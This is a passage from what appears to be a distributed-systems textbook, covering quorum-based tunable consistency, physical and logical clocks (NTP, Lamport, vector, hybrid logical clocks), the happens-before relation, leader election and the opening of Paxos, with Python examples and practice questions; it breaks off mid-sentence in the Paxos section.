# Two percent of reads pay for correctness, and the user-visible anomaly is
# gone. Full linearizability would have charged 100% of reads for it.
Key Takeaways
- Session guarantees fix the anomalies a single user perceives, which is where nearly all complaints originate.
- Read-your-writes prevents "my edit disappeared"; monotonic reads prevents values moving backwards.
- Version tokens carried in the session are the most precise and portable implementation; primary routing is the simplest.
- They cost a small fraction of traffic, versus strengthening the global model which charges every operation.
🧪 Practice
- Implement read-your-writes using version tokens for a system with one primary and five replicas, handling the case where no replica has caught up.
- Explain how sticky routing accidentally provides three of the four session guarantees, and which one it misses.
- Interview: A user updates their avatar and it reverts on refresh, then appears again. Which guarantees are missing? (Hint: two distinct anomalies are described — identify each one separately.)
Tunable Consistency
Tunable consistency lets the caller choose the consistency level per operation rather than accepting one setting for the whole system. It is the practical answer to everything above: since different operations have different correctness requirements, forcing them all to the strongest one is wasteful and forcing them all to the weakest one is wrong.
The mechanism, used by Dynamo-style systems, is quorum arithmetic. With N
replicas, a write is acknowledged after W of them confirm and a read consults
R of them. The relationship that matters is:
If R + W > N, the read set and the write set must overlap, so any read is
guaranteed to see at least one replica holding the latest acknowledged write.
QUORUM OVERLAP, N = 3
W=1, R=1 (R+W=2, NOT > 3) W=2, R=2 (R+W=4 > 3)
write -> [A] B C write -> [A][B] C
read -> A B [C] read -> [B][C]
^ ^
No overlap: the read may Overlap guaranteed: B holds the
miss the write entirely. write, so the read sees it.
Fast, weak. Slower, strong enough for
read-your-writes cluster-wide.
# The arithmetic, made concrete.
def quorum_properties(N, R, W):
return {
"strong_read": R + W > N, # read and write sets intersect
"write_survives": W > N // 2, # survives a minority partition
"node_failures_tolerated_read": N - R,
"node_failures_tolerated_write": N - W,
}
for R, W in [(1, 1), (1, 3), (2, 2), (3, 1)]:
print(f"N=3 R={R} W={W}: {quorum_properties(3, R, W)}")
# N=3 R=1 W=1: strong_read=False -- fastest both ways, no guarantee
# N=3 R=1 W=3: strong_read=True -- fast reads, writes fail if ANY node is down
# N=3 R=2 W=2: strong_read=True -- balanced; the usual default
# N=3 R=3 W=1: strong_read=True -- fast writes, reads fail if any node is down
#
# The choice is about which side you want to be fast and which you can afford
# to have fail: R=1,W=3 optimizes reads and makes writes fragile, and vice
# versa. R=W=2 is the compromise almost everyone lands on.
# Per-operation levels in practice (Cassandra syntax; DynamoDB and others
# expose the same idea with fewer knobs).
from cassandra import ConsistencyLevel as CL
# Analytics read: staleness is irrelevant, latency is everything.
session.execute(view_count_query, consistency_level=CL.ONE)
# Inventory decrement: must not oversell.
session.execute(decrement_stock, consistency_level=CL.QUORUM)
# A genuine compare-and-set needs more than quorum -- it needs consensus,
# because two concurrent quorum writes can both succeed.
session.execute("""
UPDATE inventory SET qty = 4 WHERE sku = 'X' IF qty = 5
""") # lightweight transaction: Paxos under the hood, ~4x the latency
# Multi-region correctness at multi-region cost.
session.execute(critical_write, consistency_level=CL.EACH_QUORUM)
| Level | Meaning | Typical use |
|---|---|---|
ONE | One replica responds | Metrics, logs, view counts |
QUORUM | Majority of all replicas | The general-purpose default |
LOCAL_QUORUM | Majority within the local datacentre | Multi-region, latency-aware |
EACH_QUORUM | Majority in every datacentre | Cross-region correctness |
ALL | Every replica | Rarely — one node down fails everything |
Two cautions temper the flexibility.
Quorum is not consensus. R + W > N guarantees a read sees the latest
acknowledged write; it does not serialize concurrent writes. Two clients doing
read-modify-write at QUORUM can still lose one update. Anything conditional
needs a compare-and-set backed by real consensus, which costs several times more.
LOCAL_QUORUM is the multi-region default for a reason. It keeps latency
local while retaining a majority within the region, accepting cross-region
staleness. Choosing QUORUM in a three-region cluster silently makes every
operation pay a cross-continent round trip.
Key Takeaways
- Tunable consistency sets the level per operation, matching cost to the actual correctness requirement.
R + W > Nguarantees the read and write sets overlap, so reads observe the latest acknowledged write.- Lowering
Rspeeds reads and makes writes fragile, and vice versa;R = W = ceil((N+1)/2)is the usual balance.- Quorum is not consensus — read-modify-write still needs compare-and-set, and
LOCAL_QUORUMis what keeps multi-region latency sane.
🧪 Practice
- For
N = 5, list every(R, W)pair giving strong reads and rank them by read latency and write availability.- Show how two concurrent
QUORUMread-modify-writes can lose an update despiteR + W > N.- Interview: A three-region cluster has p99 writes of 180 ms and the application is in one region. What do you check? (Hint: which quorum is the client asking for, and how far does that quorum reach?)
<a id="83-time-and-ordering"></a>
8.3 Time and Ordering
Ordering events is trivial on one machine — there is one clock and one sequence. Across machines there is no shared clock, and the mechanisms that substitute for one determine what a system can know about what happened before what.
Physical Clocks and Clock Skew
Every machine has a physical clock, and the natural instinct is to timestamp events with it and sort. That instinct produces a specific class of bug that is hard to reproduce and easy to misdiagnose, because the clocks involved are usually right — just not right enough, and not right at the same moment.
A computer's clock is a quartz oscillator counting ticks. Quartz frequency varies with temperature, voltage, and manufacturing tolerance, so every clock drifts. Typical drift is 10-100 parts per million, which sounds negligible until it is converted into a duration:
# What "a good clock" means in practice.
DRIFT_PPM = 50 # a typical, well-behaved server clock
for hours in (1, 24, 24 * 7, 24 * 30):
drift_ms = DRIFT_PPM * 1e-6 * hours * 3600 * 1000
print(f"{hours:>4}h uncorrected -> {drift_ms:>8.1f} ms of drift")
# 1h uncorrected -> 180.0 ms
# 24h uncorrected -> 4320.0 ms
# 168h uncorrected -> 30240.0 ms
# 720h uncorrected -> 129600.0 ms (over two minutes)
#
# Two servers drifting in OPPOSITE directions are twice as far apart. Without
# synchronization, timestamps from different machines are not comparable at
# any precision that matters for ordering.
Clock skew is the difference between two clocks at the same instant. Even under active synchronization, skew of 1-100 ms between machines in a datacentre is normal, and across regions or in virtualized environments it is worse. VMs are particularly bad: a paused or migrated VM can resume with its clock arbitrarily behind.
The failure this causes is silent data loss under last-write-wins:
LAST-WRITE-WINS WITH SKEWED CLOCKS
Node A clock: 10:00:00.500 (running 300 ms FAST)
Node B clock: 10:00:00.100 (running 100 ms slow)
real 10:00:00.200 Alice writes name="Alice" on node A -> ts 10:00:00.500
real 10:00:00.400 Bob writes name="Bob" on node B -> ts 10:00:00.100
^
Bob's write happened LATER in reality but carries an EARLIER timestamp.
Last-write-wins keeps Alice's. Bob's write is silently discarded, with no
error, no conflict, and no log line. Bob sees his change "not save".
The essential distinction every engineer should internalize is between the two clocks a machine offers:
| Clock | Measures | Jumps? | Use for |
|---|---|---|---|
| Wall clock | Time of day (time.time()) | Yes — NTP steps, leap seconds, manual changes | Timestamps for humans, logs, expiry dates |
| Monotonic | Elapsed time since some boot-relative origin | No, never goes backwards | Durations, timeouts, rate limiting |
import time
# WRONG: wall clock for a duration. An NTP correction mid-measurement can
# make this negative, or inflate it by the size of the step.
start = time.time()
do_work()
elapsed = time.time() - start # may be negative; has caused real
# outages when used for timeouts
# RIGHT: monotonic clock for durations. Guaranteed non-decreasing.
start = time.monotonic()
do_work()
elapsed = time.monotonic() - start # always sane
# Wall clock is correct for what it is FOR: recording when something
# happened for a human to read, or an absolute expiry.
record = {"event": "login", "at": time.time()}
The rule that follows is blunt and worth memorizing: never use wall-clock timestamps to order events across machines, and never use them to measure elapsed time. They are for display and for absolute deadlines. Ordering requires the logical clocks covered in the next several topics, or a system like Spanner's TrueTime that makes the uncertainty explicit and waits it out.
Key Takeaways
- Quartz drift of 10-100 ppm means uncorrected clocks diverge by seconds per day and minutes per month.
- Clock skew between synchronized machines is still milliseconds, and far worse on VMs that pause or migrate.
- Wall clocks jump — forwards and backwards — so they must never be used for durations or timeouts; use the monotonic clock.
- Ordering events across machines by wall-clock timestamp silently loses writes under last-write-wins.
🧪 Practice
- Compute the divergence between two clocks drifting +40 ppm and -40 ppm after one week without synchronization.
- Find every use of wall-clock time in a codebase you know and classify each as correct or as a latent bug.
- Interview: A distributed rate limiter occasionally allows double the configured rate. What do you suspect? (Hint: which clock did the window boundaries come from, and what happens when one of them steps?)
NTP and Clock Synchronization
Since clocks drift, they must be corrected, and the Network Time Protocol is how that is done almost everywhere. Understanding what NTP can and cannot guarantee determines how much you are allowed to trust a timestamp.
NTP works hierarchically. Stratum 0 is a reference source — an atomic clock or GPS receiver. Stratum 1 servers are directly attached to one. Each subsequent stratum synchronizes from the one above, with accuracy degrading at each hop. A client repeatedly exchanges timestamped messages with its servers and computes both the round-trip delay and the estimated offset.
THE NTP EXCHANGE AND ITS FUNDAMENTAL LIMITATION
client server
| t1 = send time |
|---------------------------------> | t2 = receive time
| | t3 = reply time
| <---------------------------------|
| t4 = receive time |
delay = (t4 - t1) - (t3 - t2)
offset = ((t2 - t1) + (t3 - t4)) / 2
The offset formula ASSUMES the network path is symmetric -- that the
request took as long as the reply. When it is not (a congested uplink, an
asymmetric route), the error is half the asymmetry, and NTP cannot detect
it. This is why NTP gives you accuracy of milliseconds, not microseconds.
Two correction modes exist, and the difference matters for application correctness:
| Mode | Behaviour | Risk |
|---|---|---|
| Slew | Speeds up or slows the clock to converge gradually | Slow to correct large offsets |
| Step | Jumps the clock to the correct value | Time moves BACKWARDS — breaks durations, can fire timers twice or never |
# What a healthy client looks like, and what to check when it is not.
chronyc tracking
# Reference ID : 10.0.0.1 (ntp.internal)
# Stratum : 3
# System time : 0.000234 seconds fast of NTP time
# RMS offset : 0.000512 seconds <- your real accuracy: ~0.5 ms
# Root dispersion : 0.001204 seconds <- accumulated uncertainty
# Leap status : Normal
chronyc sources -v # confirm several sources agree; one bad source that
# all your servers share is a correlated failure
Two well-known hazards deserve specific mention.
Leap seconds. Occasionally a second is inserted to keep atomic time aligned with Earth's rotation, producing a 23:59:60 that much software cannot represent. Historic leap seconds have caused widespread outages. The modern fix is leap smearing — spreading the extra second across many hours so no discontinuity occurs — which every major cloud provider now does. The catch is that a smeared server and an unsmeared one disagree by up to a second during the smear window, so a fleet must use one policy consistently.
Virtualization. A VM's clock stops advancing correctly while the VM is paused, migrated, or descheduled under host contention. Guests must use host-provided time sources, and even then a resumed VM can need a step correction — reintroducing exactly the backwards jump that breaks durations.
The engineering conclusion is that NTP gives you bounded uncertainty, not
correct time, and the bound is milliseconds at best. That is why Google built
TrueTime for Spanner: rather than pretending the clock is exact, TrueTime returns
an interval [earliest, latest] and the system waits out the uncertainty
before committing, guaranteeing that a transaction's timestamp really is in the
past everywhere.
# The idea behind commit-wait, which is what TrueTime buys.
def commit_with_uncertainty(txn, uncertainty_ms=7):
commit_ts = now_latest() # the LATEST time it might be
apply_writes(txn, timestamp=commit_ts)
# Wait until commit_ts is definitely in the past on EVERY node, so no
# other node can later assign an earlier timestamp to a later event.
time.sleep(uncertainty_ms / 1000.0)
make_visible(txn)
# The cost of external consistency is exactly this wait -- a few milliseconds
# per transaction, paid deliberately, in exchange for globally correct
# ordering. Spanner's investment in GPS and atomic clocks exists to make the
# uncertainty small enough that this wait is affordable.
Key Takeaways
- NTP corrects drift hierarchically but assumes symmetric network paths, which bounds accuracy to milliseconds.
- Step corrections move the clock backwards and break anything measuring durations; prefer slewing and always use monotonic clocks for intervals.
- Leap seconds and VM pause/migration are the two classic sources of sudden clock discontinuity; smear policy must be fleet-wide.
- NTP provides bounded uncertainty, not exact time — systems needing correct ordering must make the uncertainty explicit and wait it out.
🧪 Practice
- Compute the NTP offset and delay for
t1=100.000,t2=100.030,t3=100.032,t4=100.070, and state the assumption you relied on.- Explain what happens to a 30-second lease when the holder's clock steps forward by 60 seconds.
- Interview: Why does Spanner need GPS and atomic clocks when NTP exists? (Hint: the protocol does not remove uncertainty — what does Spanner do with the uncertainty, and what does its size cost?)
Lamport Timestamps
Since physical clocks cannot order events across machines, Lamport proposed abandoning physical time entirely. A logical clock is a counter that captures causality rather than duration — it does not tell you when something happened, only what it could have been influenced by.
The algorithm, from Lamport's 1978 paper, is three rules and a single integer per process:
- Before any local event, increment your counter.
- When sending a message, increment and attach your counter.
- On receiving a message, set your counter to
max(local, received) + 1.
That max is the entire mechanism. It propagates knowledge forward: a process
that receives a message can never again issue a timestamp lower than the sender's
at the moment of sending, so causality is preserved in the numbers.
class LamportClock:
def __init__(self):
self.time = 0
def local_event(self):
self.time += 1 # rule 1
return self.time
def send(self):
self.time += 1 # rule 2
return self.time # attach this to the message
def receive(self, sender_time):
# rule 3: adopt the sender's knowledge, then advance past it. This is
# what guarantees the receiver's next timestamp exceeds the sender's.
self.time = max(self.time, sender_time) + 1
return self.time
LAMPORT CLOCKS IN ACTION
P1: 1 -- 2 ---------------- 3
| msg(2) |
v |
P2: 3 -- 4 ----------- |
| msg(4) |
v v
P3: 1 ------- 5 ----------- 6
P2's receive: max(0, 2) + 1 = 3. Its next local event is 4.
P3's receive: max(1, 4) + 1 = 5.
Guarantee: if A happens-before B, then L(A) < L(B).
NOT guaranteed: if L(A) < L(B), then A happens-before B.
That asymmetry is the crucial limitation. Lamport timestamps give a one-way implication. A lower timestamp does not mean causality — two concurrent events on different processes can have any relative timestamps, and the numbers cannot tell you they were concurrent.
# The limitation, demonstrated.
# P1 does three local events: L = 1, 2, 3
# P2 does one local event: L = 1
# These processes never communicated, so ALL FOUR events are concurrent.
#
# Yet P1's event 1 and P2's event 1 have the SAME timestamp, and P1's event 3
# has a HIGHER timestamp than P2's event 1 despite no causal relationship.
#
# Lamport timestamps can prove causality is POSSIBLE. They can never prove
# two events were concurrent. Vector clocks (next topic) close exactly this
# gap, at the cost of O(N) metadata instead of O(1).
Their practical value comes from the total order they produce when ties are
broken deterministically. Sorting by (lamport_time, node_id) gives every node
the same ordering of all events, and that order is consistent with causality —
which is exactly what a replicated state machine needs.
def total_order_key(event):
# Tie-break by node ID to make the order total and identical everywhere.
# Any deterministic tiebreak works; every node must use the SAME one.
return (event.lamport_time, event.node_id)
ordered = sorted(all_events, key=total_order_key)
# Every replica applying `ordered` reaches the same final state, and no
# effect is ever applied before its cause. The order is somewhat arbitrary
# for concurrent events -- which is fine, because by definition nothing
# observed them in a particular order.
Lamport clocks appear in production far more often than their age suggests: as sequence numbers in replicated logs, as the ordering mechanism inside consensus protocols, and as the basis of hybrid logical clocks. They cost one integer, which is why they remain the default when full causality tracking is too expensive.
Key Takeaways
- A Lamport clock is a per-process counter advanced by
max(local, received) + 1on receipt, capturing causality without physical time.- It guarantees that if A happens-before B then
L(A) < L(B), but the converse does not hold.- It cannot detect concurrency — two unrelated events may have any relative timestamps.
- Breaking ties by node ID yields a total order consistent with causality, which is what replicated state machines need.
🧪 Practice
- Trace Lamport timestamps for three processes exchanging five messages of your choosing, and identify a pair of concurrent events with ordered timestamps.
- Explain why
max(local, received) + 1is required rather thanreceived + 1.- Interview: Two events have Lamport timestamps 7 and 9. What can you conclude? (Hint: state the implication in the direction it actually runs.)
Vector Clocks
Vector clocks fix the one thing Lamport timestamps cannot do: detect concurrency. Instead of one counter, each process keeps a vector with one entry per process — its own count plus its knowledge of everyone else's.
The idea is that a vector is a summary of everything a process has seen. If process A's vector dominates process B's in every position, A knows everything B knew, so B's event happened before A's. If each vector is ahead in some position and behind in another, neither knows about the other's event, so they are concurrent by definition.
class VectorClock:
def __init__(self, node_id, nodes):
self.node_id = node_id
self.vec = {n: 0 for n in nodes}
def local_event(self):
self.vec[self.node_id] += 1 # only ever increment YOUR OWN entry
return dict(self.vec)
def send(self):
self.vec[self.node_id] += 1
return dict(self.vec) # ship the whole vector
def receive(self, other):
# Take the elementwise maximum: adopt everything the sender knew.
for n, c in other.items():
self.vec[n] = max(self.vec.get(n, 0), c)
self.vec[self.node_id] += 1 # then account for this receive event
return dict(self.vec)
def compare(a, b):
"""Returns 'before', 'after', 'concurrent', or 'equal'."""
a_le_b = all(a.get(n, 0) <= b.get(n, 0) for n in set(a) | set(b))
b_le_a = all(b.get(n, 0) <= a.get(n, 0) for n in set(a) | set(b))
if a_le_b and b_le_a: return "equal"
if a_le_b: return "before" # a happens-before b
if b_le_a: return "after"
return "concurrent" # neither dominates -> genuinely parallel, and this
# is the answer Lamport clocks cannot give
DETECTING A CONFLICT THAT LAMPORT CLOCKS WOULD MISS
A writes: {A:1, B:0, C:0}
B writes: {A:0, B:1, C:0}
compare -> A is ahead in position A, B is ahead in position B
-> CONCURRENT -> a genuine write-write conflict
Now B receives A's update and writes again: {A:1, B:2, C:0}
compare with A's {A:1, B:0, C:0}
-> B dominates in every position -> AFTER
-> not a conflict; B's write supersedes A's, safely
This is what lets a Dynamo-style store distinguish "this write supersedes that one" from "these two writes genuinely conflict and someone must decide". A conflict detected is a conflict that can be resolved intentionally — by application logic, by presenting both siblings to the client, or by a CRDT merge — rather than silently discarded by last-write-wins.
# Conflict handling in a versioned store.
def put(key, value, context_clock):
existing = store.get(key)
if existing is None:
return store.write(key, [(value, clock.local_event())])
siblings = []
for old_value, old_clock in existing:
rel = compare(context_clock, old_clock)
if rel == "after":
continue # our write supersedes this one
if rel == "concurrent":
siblings.append((old_value, old_clock)) # keep BOTH; resolve later
siblings.append((value, clock.local_event()))
return store.write(key, siblings)
# The shopping-cart classic: two concurrent adds produce two siblings, and
# the merge is a set union -- so nothing the customer added is ever lost.
The cost is metadata that grows with the number of writers: O(N) per value for
N nodes. In a cluster with hundreds of nodes and clients writing directly, the
clock can dwarf the data. Real systems bound it in three ways:
| Technique | Approach |
|---|---|
| Per-key vectors | Track only the nodes that wrote this key |
| Client-side IDs | One entry per client session, not per storage node |
| Dotted version vectors | Precise sibling tracking with bounded size |
| Pruning | Drop the oldest entries past a threshold, accepting rare false conflicts |
| Property | Lamport | Vector |
|---|---|---|
| Size | O(1) | O(N) |
| Detects causality | One-way only | Yes |
| Detects concurrency | No | Yes |
| Gives a total order | Yes (with tiebreak) | Partial order only |
Key Takeaways
- A vector clock holds one counter per process, so comparing vectors reveals whether events are ordered or concurrent.
- Domination in every position means happens-before; mutual non-domination means genuine concurrency.
- Detecting concurrency is what allows a conflict to be resolved deliberately rather than silently lost.
- The
O(N)metadata cost is real; bound it with per-key vectors, client-scoped entries, or dotted version vectors.
🧪 Practice
- Given
{A:2,B:1,C:0}and{A:1,B:3,C:0}, determine the relationship and explain your reasoning position by position.- Implement the shopping-cart sibling merge and show that no item is lost under concurrent adds from two devices.
- Interview: Why did Riak expose siblings to the client instead of resolving conflicts itself? (Hint: what does the database know about which of two concurrent values is "right"?)
Hybrid Logical Clocks
Logical clocks capture causality but produce numbers with no relation to real time — you cannot ask "what did this key look like at 14:00?" of a Lamport timestamp. Physical clocks relate to real time but cannot be trusted for ordering. Hybrid logical clocks (HLC) combine both: a timestamp that is close to physical time and guaranteed consistent with causality.
An HLC timestamp is a pair (l, c): l is a physical-time component that only
ever moves forward, and c is a logical counter that breaks ties when multiple
events share the same l. The update rules keep l close to wall-clock time
while never allowing it to violate happens-before.
class HybridLogicalClock:
def __init__(self):
self.l = 0 # physical component (ms), monotonically non-decreasing
self.c = 0 # logical counter, breaks ties within the same ms
def now(self):
return int(time.time() * 1000)
def send_or_local(self):
pt = self.now()
if pt > self.l:
self.l, self.c = pt, 0 # physical time advanced: use it,
else: # reset the counter
self.c += 1 # clock has not ticked (or went
# backwards): advance logically
return (self.l, self.c)
def receive(self, m_l, m_c):
pt = self.now()
# Take the maximum of: our clock, the message's clock, physical time.
new_l = max(self.l, m_l, pt)
if new_l == self.l == m_l:
self.c = max(self.c, m_c) + 1 # same ms on both sides
elif new_l == self.l:
self.c += 1 # ours was ahead
elif new_l == m_l:
self.c = m_c + 1 # theirs was ahead
else:
self.c = 0 # physical time won: fresh start
self.l = new_l
return (self.l, self.c)
WHY HLC STAYS CLOSE TO PHYSICAL TIME
node A (clock 100 ms FAST) sends at (1000500, 0)
node B (clock correct, real time 1000200) receives:
new_l = max(1000200, 1000500, 1000200) = 1000500
-> B's HLC jumps to A's value to preserve causality
B's HLC is now 300 ms ahead of its physical clock -- but BOUNDED by the
maximum clock skew in the cluster, because that is the largest jump any
message can induce. Unlike a Lamport clock, it cannot run away: once
physical time catches up, the l component tracks it again.
The properties that make HLCs useful in production databases:
| Property | Lamport | Physical | HLC |
|---|---|---|---|
| Consistent with causality | Yes | No | Yes |
| Close to wall-clock time | No | Yes | Yes |
| Constant size | Yes | Yes | Yes |
| Bounded divergence from real time | No | — | Yes (by max skew) |
| Detects concurrency | No | No | No |
# The capability HLCs enable: meaningful time-travel queries on a causally
# consistent timestamp.
def read_as_of(key, wall_clock_ms):
# Because the l component tracks physical time within the skew bound, a
# human-meaningful time maps onto a causally sound snapshot.
return store.read_version_at(key, hlc=(wall_clock_ms, 0))
# SELECT * FROM orders AS OF SYSTEM TIME '2026-08-25 14:00:00';
#
# This is exactly what CockroachDB and YugabyteDB do. It is impossible with
# pure Lamport timestamps (the numbers mean nothing to a human) and unsafe
# with pure physical timestamps (the snapshot could violate causality).
HLCs are used by CockroachDB, YugabyteDB, MongoDB (for its cluster time), and several others. They occupy a genuine sweet spot: the causal safety of logical clocks, the interpretability of physical clocks, constant size, and — unlike Spanner's TrueTime — no requirement for specialized GPS or atomic-clock hardware. The trade is that HLC does not shrink clock uncertainty, so systems using it generally offer serializable snapshot isolation rather than Spanner's external consistency.
Key Takeaways
- An HLC pairs a monotonic physical component with a logical counter, giving timestamps that are both causally correct and human-meaningful.
- Its divergence from real time is bounded by the cluster's maximum clock skew, so it cannot run away like a Lamport clock.
- It has constant size and needs no special hardware, which is why modern distributed SQL databases adopt it.
- Like Lamport clocks, it produces a total order and cannot detect concurrency.
🧪 Practice
- Trace HLC values for two nodes with 50 ms of skew exchanging three messages.
- Explain why
lcan exceed local physical time and what bounds the excess.- Interview: Why can CockroachDB support
AS OF SYSTEM TIMEqueries when a Lamport-clock system cannot? (Hint: what would you pass as the argument?)
Happens-Before Relation
The happens-before relation, written A → B, is the formal definition of
potential causality that underlies everything in this subchapter. Lamport defined
it in 1978, and every clock mechanism above exists to approximate or capture it.
It is defined by three rules:
- If A and B are events in the same process and A comes first, then
A → B. - If A is the sending of a message and B is its receipt, then
A → B. - Transitivity: if
A → BandB → C, thenA → C.
If neither A → B nor B → A, the events are concurrent, written A || B.
The crucial subtlety is in the word potential. Happens-before does not mean A caused B; it means A could have influenced B, because information could have flowed from one to the other. Two events may be causally related in the real world — I phone you and you act on it — while being concurrent as far as the system is concerned, because the influence travelled outside the system. That gap is why "external consistency" is a stronger and separate requirement.
THE HAPPENS-BEFORE LATTICE
P1: a ------> b ---------> c
\ msg
\
P2: d ----> e ------> f
\ msg
\
P3: g -------------> h --> i
a -> b -> c (rule 1, within P1)
b -> e (rule 2, message)
b -> e -> f (rule 3, transitivity)
b -> e -> h -> i (rule 3, a longer chain)
a || d (no path between them: CONCURRENT)
c || f (c happens after b, but nothing links c to f)
a || g (different processes, no communication)
Concurrency is the ABSENCE of a path, not a statement about wall-clock
simultaneity. c and f may occur hours apart and still be concurrent.
# Building the relation explicitly, which is what a debugger or a tracing
# system does when it reconstructs a distributed execution.
def happens_before(a, b, events):
"""Is there a causal path from a to b?"""
if a.process == b.process:
return a.seq < b.seq # rule 1
# Rules 2 and 3: walk the graph of message edges and process order.
return _reachable(a, b, build_edges(events))
def build_edges(events):
edges = defaultdict(set)
by_process = defaultdict(list)
for e in events:
by_process[e.process].append(e)
for proc_events in by_process.values(): # rule 1 edges
for earlier, later in zip(proc_events, proc_events[1:]):
edges[earlier.id].add(later.id)
for e in events: # rule 2 edges
if e.type == "receive":
edges[e.matching_send_id].add(e.id)
return edges # rule 3 is reachability
def is_concurrent(a, b, events):
return not happens_before(a, b, events) and not happens_before(b, a, events)
Happens-before is a partial order, not a total one — and that is not a deficiency, it is a truthful description of reality. Concurrent events genuinely have no order; imposing one requires either coordination (making them not concurrent) or an arbitrary tiebreak (declaring an order that means nothing).
The relation to the clock mechanisms is exact and worth stating as a summary, because it explains what each one is for:
| Mechanism | Relationship to happens-before |
|---|---|
| Lamport clock | A → B implies L(A) < L(B); the converse does not hold |
| Vector clock | A → B if and only if V(A) < V(B); captures it exactly |
| HLC | Same guarantee as Lamport, plus a physical-time approximation |
| Physical clock | No guarantee at all — skew can invert the order |
Practically, happens-before is what you reason with when deciding whether two
operations need coordination. If A → B in your design, ordering is already
guaranteed by the message flow and no synchronization is needed. If A || B,
either the operations must commute (so order does not matter), or you must
introduce coordination to create an ordering, or you must detect the conflict and
resolve it. There is no fourth option, and recognizing which case you are in is
most of distributed design.
Key Takeaways
A → Bmeans information could have flowed from A to B, via process order, message passing, or transitivity.- Concurrent means no causal path exists — not that the events were simultaneous in wall-clock terms.
- It is a partial order because concurrent events genuinely have no order; forcing one requires coordination or an arbitrary tiebreak.
- Vector clocks capture happens-before exactly; Lamport clocks and HLCs capture only the forward implication.
🧪 Practice
- For the lattice diagram above, list every pair involving
dand classify each as ordered or concurrent.- Explain why happens-before captures potential rather than actual causality, and give an example where the two differ.
- Interview: Two writes to the same key are concurrent. What are your options? (Hint: there are exactly three, and one of them changes the operations rather than the system.)
<a id="84-consensus-and-coordination"></a>
8.4 Consensus and Coordination
Consensus is the problem of getting a group of unreliable machines to agree on a single value. Nearly every hard coordination task — electing a leader, holding a lock, committing a transaction, changing cluster membership — reduces to it.
Leader Election
Many distributed problems become dramatically simpler if exactly one node is designated to make decisions. A single leader can serialize writes, assign sequence numbers, hold the authoritative view of state, and coordinate others — turning a distributed agreement problem into a local one.
The difficulty is not electing a leader; it is guaranteeing there is at most one at a time when nodes cannot reliably tell whether a peer is dead or merely slow. FLP tells us that determination cannot be made perfectly, so every leader election protocol is built to remain correct when the determination is wrong.
WHY "AT MOST ONE" IS THE HARD PART
Leader L is GC-pausing for 8 seconds.
Followers stop receiving heartbeats and elect L2.
L wakes up, unaware that any time passed, and continues acting as leader.
time --->
L : [leader]-----[ GC pause ]----[still believes it is leader]----->
F1: heartbeats.....(silence)......[elect L2]......................
L2: [leader]------------------------>
^^^^^^ TWO LEADERS ^^^^^^
Both may write. Both may respond to clients. The system has split brain
without any network partition at all -- just a slow process.
Three mechanisms combine to make this safe.
Majority quorum. A candidate needs votes from more than half the cluster. Since two majorities of the same set must intersect, and each node votes at most once per term, at most one leader can be elected per term.
Terms (epochs). Every election increments a monotonically increasing number. Messages carry the term of their sender, and any node seeing a higher term immediately steps down. This is how a returning old leader learns it was replaced — the first response it gets carries a term it does not recognize.
Fencing tokens. External systems reject writes carrying a term lower than the highest they have seen, so a stale leader is stopped by the storage layer even before it discovers its own obsolescence.
# Term-based election, the core of Raft's approach.
class Node:
def __init__(self, node_id, peers):
self.id, self.peers = node_id, peers
self.term = 0
self.voted_for = None # at most ONE vote per term
self.state = "follower"
self.election_timeout = self._random_timeout()
def _random_timeout(self):
# Randomized so nodes do not all time out together and split the vote.
# Without this, repeated split elections can stall the cluster.
return random.uniform(0.150, 0.300)
def start_election(self):
self.term += 1 # new term
self.state = "candidate"
self.voted_for = self.id # vote for yourself
votes = 1
for peer in self.peers:
granted, peer_term = peer.request_vote(self.term, self.id,
self.last_log_index,
self.last_log_term)
if peer_term > self.term:
self.step_down(peer_term) # someone is more current
return
votes += granted
if votes > (len(self.peers) + 1) // 2:
self.become_leader()
def request_vote(self, term, candidate_id, last_log_index, last_log_term):
if term < self.term:
return False, self.term # stale candidate
if term > self.term:
self.step_down(term) # adopt the newer term
# Grant only if we have not voted this term AND the candidate's log
# is at least as up to date as ours -- this second condition is what
# prevents a node missing committed entries from becoming leader.
up_to_date = (last_log_term, last_log_index) >= (self.last_log_term,
self.last_log_index)
if self.voted_for in (None, candidate_id) and up_to_date:
self.voted_for = candidate_id
return True, self.term
return False, self.term
The parameter that governs behaviour is the election timeout, and it is a direct trade:
def election_tradeoff(heartbeat_ms, timeout_ms, p99_gc_pause_ms):
return {
"detection_time_ms": timeout_ms,
"missed_heartbeats_tolerated": timeout_ms // heartbeat_ms,
# If the timeout is shorter than a plausible GC pause, healthy leaders
# get deposed regularly -- each election costing a window of
# unavailability for no reason.
"spurious_elections_likely": timeout_ms < p99_gc_pause_ms * 1.5,
}
print(election_tradeoff(heartbeat_ms=50, timeout_ms=200, p99_gc_pause_ms=400))
# {'detection_time_ms': 200, 'missed_heartbeats_tolerated': 4,
# 'spurious_elections_likely': True}
#
# A 200 ms timeout on a JVM with 400 ms GC pauses guarantees flapping
# leadership. Either tune the GC or lengthen the timeout -- but know that
# lengthening it directly lengthens failover time.
| Approach | Guarantees | Notes |
|---|---|---|
| Consensus-based (Raft/Paxos) | Safe: one leader per term | Needs a majority to be alive |
| Lease from a coordinator | Safe if clock drift is bounded | Depends on ZooKeeper/etcd |
| Bully algorithm | Simple; assumes reliable detection | Not partition-safe |
| Ring-based | Low message count | Fragile to node failure |
Key Takeaways
- A single leader simplifies coordination; the hard guarantee is that at most one exists at any time.
- Majority quorum plus one vote per term makes two leaders in the same term impossible.
- Monotonic terms let a returning stale leader detect it was replaced, and fencing tokens stop it before it does.
- Election timeout trades failover speed against spurious elections — it must exceed plausible GC pauses.
🧪 Practice
- Explain why randomized election timeouts are necessary and what happens without them.
- Show how the "candidate's log must be up to date" rule prevents committed data loss.
- Interview: A leader GC-pauses for 10 seconds and returns. What stops it from corrupting state? (Hint: two independent mechanisms — one it learns from its peers, one enforced without its cooperation.)
Paxos Overview
Paxos, published by Lamport in 1998, was the first proven-correct solution to consensus under asynchrony with crash failures. It is famous for being difficult to understand and is the theoretical ancestor of most systems in production.
The problem it solves precisely: a set of nodes must agree on one value, such that (safety) only a proposed value is chosen and all nodes learn the same one, and (liveness) some value is eventually chosen if enough nodes are alive. Given FLP, Paxos guarantees safety unconditionally and liveness only when the network behaves.
There are three roles, often played by the same physical nodes: proposers suggest values, acceptors vote, and learners observe the outcome.
Basic Paxos runs in two phases:
PAXOS: TWO PHASES
PHASE 1 (Prepare / Promise)
proposer -> acceptors: PREPARE(n) n = a unique proposal number
acceptor: if n > any n seen before:
promise never to accept a proposal numbered < n
reply PROMISE(n, highest accepted value so far, if any)
PHASE 2 (Propose / Accept)
proposer: if a majority promised:
if ANY promise carried an accepted value ->
